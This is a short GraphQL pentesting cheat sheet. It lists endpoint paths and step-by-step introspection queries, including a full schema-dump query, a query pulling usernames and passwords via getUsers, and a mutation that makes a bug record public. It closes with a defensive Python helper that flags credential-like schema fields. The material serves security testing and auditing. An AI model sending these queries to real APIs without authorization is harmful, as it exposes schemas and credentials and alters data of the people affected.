GraphQL Pentesting
Last modified: 2023-03-20
An open-source data query and manipulation language for APIs, and a runtime for fulfilling queries with existing data.
Common Directories
/graphql
/graphiql
/graphql.php
/graphql/console
Queries
Send the following introspection queries in turn and inspect each response; every step reveals a little more of the schema.
/graphql?q={}
/graphql?q={__schema{}}
/graphql?q={__schema{types{name}}}
/graphql?q={__schema{types{fields{name}}}}
/graphql?q={__schema{types{fields{name description}}}}
/graphql?q={__schema{types{name,fields{name}}}}
/graphql?q={__schema{types{name,fields{name,args{name,description,type{name,kind,ofType{name, kind}}}}}}}
# Dump the full schema (complete introspection query, URL-encoded)
/graphql?q=fragment+FullType+on+__Type+{++kind++name++description++fields(includeDeprecated%3a+true)+{++++name++++description++++args+{++++++...InputValue++++}++++type+{++++++...TypeRef++++}++++isDeprecated++++deprecationReason++}++inputFields+{++++...InputValue++}++interfaces+{++++...TypeRef++}++enumValues(includeDeprecated%3a+true)+{++++name++++description++++isDeprecated++++deprecationReason++}++possibleTypes+{++++...TypeRef++}}fragment+InputValue+on+__InputValue+{++name++description++type+{++++...TypeRef++}++defaultValue}fragment+TypeRef+on+__Type+{++kind++name++ofType+{++++kind++++name++++ofType+{++++++kind++++++name++++++ofType+{++++++++kind++++++++name++++++++ofType+{++++++++++kind++++++++++name++++++++++ofType+{++++++++++++kind++++++++++++name++++++++++++ofType+{++++++++++++++kind++++++++++++++name++++++++++++++ofType+{++++++++++++++++kind++++++++++++++++name++++++++++++++}++++++++++++}++++++++++}++++++++}++++++}++++}++}}query+IntrospectionQuery+{++__schema+{++++queryType+{++++++name++++}++++mutationType+{++++++name++++}++++types+{++++++...FullType++++}++++directives+{++++++name++++++description++++++locations++++++args+{++++++++...InputValue++++++}++++}++}}
# The same introspection query, unencoded
/graphql?q=fragment FullType on __Type { kind name description fields(includeDeprecated: true) { name description args { ...InputValue } type { ...TypeRef } isDeprecated deprecationReason } inputFields { ...InputValue } interfaces { ...TypeRef } enumValues(includeDeprecated: true) { name description isDeprecated deprecationReason } possibleTypes { ...TypeRef }}fragment InputValue on __InputValue { name description type { ...TypeRef } defaultValue}fragment TypeRef on __Type { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name ofType { kind name } } } } } } }}query IntrospectionQuery { __schema { queryType { name } mutationType { name } types { ...FullType } directives { name description locations args { ...InputValue } } }}
# Query specific fields (here getUsers with username and password) once the schema dump has revealed their names
/graphql?q={getUsers{username,password}}
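A schema-audit helper, added here as an example and not part of the original page, that parses the JSON an IntrospectionQuery like the one above returns: it collapses the TypeRef ofType chain into readable GraphQL type syntax, lists every field and argument per object type, and flags field names that look like credentials so a defender can review what the schema exposes. The introspection response is constructed inline; its type and field names (Query, Mutation, User, ModifyBugResult) are assumptions.

```python
import json

# Constructed sample: the shape the IntrospectionQuery above returns, trimmed to a few types.
SAMPLE_INTROSPECTION = json.loads("""
{"data": {"__schema": {
  "queryType": {"name": "Query"}, "mutationType": {"name": "Mutation"},
  "types": [
    {"kind": "OBJECT", "name": "Query", "fields": [
      {"name": "getUsers", "args": [], "type": {"kind": "NON_NULL", "name": null,
        "ofType": {"kind": "LIST", "name": null, "ofType": {"kind": "OBJECT", "name": "User", "ofType": null}}}}]},
    {"kind": "OBJECT", "name": "Mutation", "fields": [
      {"name": "modifyBug", "type": {"kind": "OBJECT", "name": "ModifyBugResult", "ofType": null},
       "args": [{"name": "id", "type": {"kind": "SCALAR", "name": "Int", "ofType": null}},
                {"name": "private", "type": {"kind": "SCALAR", "name": "Boolean", "ofType": null}}]}]},
    {"kind": "OBJECT", "name": "User", "fields": [
      {"name": "username", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": null}},
      {"name": "password", "args": [], "type": {"kind": "SCALAR", "name": "String", "ofType": null}}]},
    {"kind": "OBJECT", "name": "__Schema", "fields": []}]}}}
""")

SENSITIVE_WORDS = ("password", "secret", "token", "ssn", "apikey")

def render_type(tref):
    """Collapse a TypeRef ofType chain (NON_NULL / LIST wrappers) into GraphQL syntax, e.g. [User]!."""
    if tref["kind"] == "NON_NULL":
        return render_type(tref["ofType"]) + "!"
    if tref["kind"] == "LIST":
        return "[" + render_type(tref["ofType"]) + "]"
    return tref["name"]

def summarize_schema(introspection):
    """Map each user-defined object type to {field name: '(args): ReturnType'}."""
    summary = {}
    for t in introspection["data"]["__schema"]["types"]:
        if t["kind"] != "OBJECT" or t["name"].startswith("__"):
            continue  # skip the introspection meta-types (__Schema, __Type, ...)
        summary[t["name"]] = {}
        for f in t.get("fields") or []:
            args = ", ".join(f"{a['name']}: {render_type(a['type'])}" for a in f.get("args") or [])
            summary[t["name"]][f["name"]] = (f"({args})" if args else "") + ": " + render_type(f["type"])
    return summary

def sensitive_fields(summary):
    """Fields whose names hint at credentials or secrets, as 'Type.field' strings: review these first."""
    return [f"{t}.{name}" for t, fields in summary.items() for name in fields
            if any(w in name.lower() for w in SENSITIVE_WORDS)]

if __name__ == "__main__":
    s = summarize_schema(SAMPLE_INTROSPECTION)
    print(s, "\nreview first:", sensitive_fields(s))
```

To audit a real deployment, replace SAMPLE_INTROSPECTION with the parsed response of the introspection query and compare the flagged fields against what the API is meant to expose.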
Mutations
Mutations modify server-side data. Their names and arguments (such as modifyBug below) are listed under mutationType in the schema dump.
mutation {
  modifyBug(id: 2, private: false) {
    ok
  }
}